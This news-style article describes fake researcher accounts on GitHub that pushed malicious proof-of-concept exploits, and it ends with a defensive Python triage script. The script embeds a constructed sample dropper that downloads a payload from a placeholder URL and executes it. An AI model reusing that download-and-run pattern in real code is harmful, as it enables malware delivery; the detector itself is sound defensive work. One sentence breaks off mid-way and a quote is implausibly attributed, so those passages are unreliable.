
At least six GitHub accounts run by fake researchers claiming affiliation with fraudulent cybersecurity firms have been observed pushing malicious repositories to the code hosting service.
All seven repositories that were still available at the time of writing claim to be proof-of-concept (PoC) exploits for alleged zero-day flaws in Discord, Google Chrome, and Microsoft Exchange.
VulnCheck, which spotted the activity, said: “The individuals who created these repositories created networks of accounts and Twitter profiles, and by pretending to be part of a non-existent company called High Sierra Cyber Security, they managed to access the repositories. We put a lot of effort into making it look legit.”

The cybersecurity firm said it first encountered the rogue activity in early May, when repositories were observed pushing similar PoC exploits for zero-day bugs in Signal and WhatsApp. Those two repositories have since been deleted.
In addition to sharing some of its alleged findings on Twitter in an attempt to build legitimacy, the account network also uses headshots of real security researchers from companies such as Rapid7, which helps the attackers carry out their campaigns. It is suggested that a great deal of effort was expended in the creation of

The PoC is a Python script designed to download a malicious binary and run it on the victim’s Windows or Linux system.
VulnCheck researcher Jacob Baines said, “The attackers put a lot of effort into creating these fake personas, but all they did was deliver obvious malware. It’s unclear if they were successful, but given their continued pursuit of this avenue, they seem to believe they did.”
It is currently unknown whether this is the work of an amateur attacker or an Advanced Persistent Threat (APT), but as Google revealed in January 2021, security researchers have been under surveillance by North Korean nation-state groups before.
Regardless, the findings underscore that care is needed when downloading code from open source repositories, and that users should scrutinize code before running it to see whether it poses a security risk.
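As an added illustration of the scrutiny recommended above (not code from the article or from VulnCheck), the following static triage script uses Python’s `ast` module to flag the download-and-execute shape described earlier: a network fetch, an execution call, and a Windows-versus-Linux probe. The two embedded scripts are constructed samples with a placeholder URL, not real repository contents, and the call lists are my own assumptions about common dropper idioms.

```python
import ast
# Dotted-name suffixes for calls that fetch remote content or execute a file.
FETCH_CALLS = ("urlretrieve", "urlopen", "requests.get", "requests.post")
EXEC_CALLS = ("os.system", "os.popen", "os.execv", "os.startfile",
              "subprocess.run", "subprocess.call", "subprocess.Popen")
PLATFORM_PROBES = ("platform.system", "os.name", "sys.platform")  # picks Windows vs Linux payload

# Constructed sample, not a real repository: the download-and-run shape the article describes.
SAMPLE_DROPPER = '''
import os, platform, urllib.request
def exploit(target):
    url = "https://example.invalid/poc-payload"
    path = "payload.exe" if platform.system() == "Windows" else "/tmp/.payload"
    urllib.request.urlretrieve(url, path)
    os.system(path)
'''
# Constructed sample of a benign version checker that only talks to the target.
SAMPLE_CHECKER = '''
import requests
def is_vulnerable(url):
    return "1.0.0" in requests.get(url, timeout=5).text
'''

def dotted_name(node):
    """Rebuild 'a.b.c' from an Attribute/Name chain; '' for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
    return ".".join(reversed(parts))

def triage_poc(source):
    """Statically flag download-and-execute behaviour in a Python PoC script."""
    found = {"fetch": [], "exec": [], "platform": [], "urls": []}
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            name = dotted_name(node.func)
            if name.endswith(FETCH_CALLS):
                found["fetch"].append(name)
            elif name.endswith(EXEC_CALLS):
                found["exec"].append(name)
        elif isinstance(node, ast.Attribute) and dotted_name(node) in PLATFORM_PROBES:
            found["platform"].append(dotted_name(node))  # OS-specific payload selection
        elif isinstance(node, ast.Constant) and isinstance(node.value, str) \
                and node.value.startswith(("http://", "https://")):
            found["urls"].append(node.value)  # hard-coded download locations to review
    found["verdict"] = "download-and-execute" if found["fetch"] and found["exec"] else "no-dropper-pattern"
    return found
```

A hit is a reason to read the script by hand rather than run it; a miss is not proof of safety, since obfuscated or base64-wrapped droppers will not match these names.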